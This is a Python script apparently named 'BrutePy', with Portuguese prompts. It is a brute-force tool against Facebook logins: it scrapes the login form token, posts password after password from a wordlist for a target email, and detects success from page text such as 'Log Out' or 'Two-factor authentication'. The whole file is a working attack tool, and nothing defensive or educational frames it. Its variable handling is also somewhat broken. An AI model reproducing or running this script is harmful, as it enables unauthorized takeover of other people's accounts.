#!/bin/python3.8
import os.path
import requests
from bs4 import BeautifulSoup
import sys
def main():
    def facebook():
        PASSWORD_FILE = input("Digite o nome da WorldList: ")
        MIN_PASSWORD_LENGTH = 6
        POST_URL = input("Digite a Url que deseja fazer o bruteforce: ")
        HEADERS = {
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
}
        PAYLOAD = {}
        COOKIES = {}


        def create_form():
            form = dict()
            cookies = {'fr': '0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'}

            data = requests.get(POST_URL, headers=HEADERS)
            for i in data.cookies:
                cookies[i.name] = i.value
            data = BeautifulSoup(data.text, 'html.parser').form
            if data.input['name'] == 'lsd':
                form['lsd'] = data.input['value']
            return form, cookies


        def is_this_a_password(email, index, password):
            global PAYLOAD, COOKIES
            if index % 10 == 0:
                PAYLOAD, COOKIES = create_form()
                PAYLOAD['email'] = email
            PAYLOAD['pass'] = password
            r = requests.post(POST_URL, data=PAYLOAD, cookies=COOKIES, headers=HEADERS)
            if 'Find Friends' in r.text or 'security code' in r.text or 'Two-factor authentication' in r.text or "Log Out" in r.text:
                open('temp', 'w').write(str(r.content))
                print('\nSenha encontrada: ', password)
                return True
            return False


        if __name__ == "__main__":
            print('\n\033[1;36m---------- \033[1;31mBrutePy \033[1;36m----------\033[0;0m\n')
            if not os.path.isfile(PASSWORD_FILE):
                print(f"[!]Wordlist {PASSWORD_FILE} não existente!")
                sys.exit(0)
            password_data = open(PASSWORD_FILE, 'r').read().split("\n")
            print(f"Wordlist selecionada: {PASSWORD_FILE}")
            email = input('Insira o e-maim/usuário para continuar: ').strip()
            for index, password in zip(range(password_data.__len__()), password_data):
                password = password.strip()
                if len(password) < MIN_PASSWORD_LENGTH:
                    continue
                print("Tentando senha [", index, "]: ", password)
                if is_this_a_password(email, index, password):
                    break
    facebook()
main()
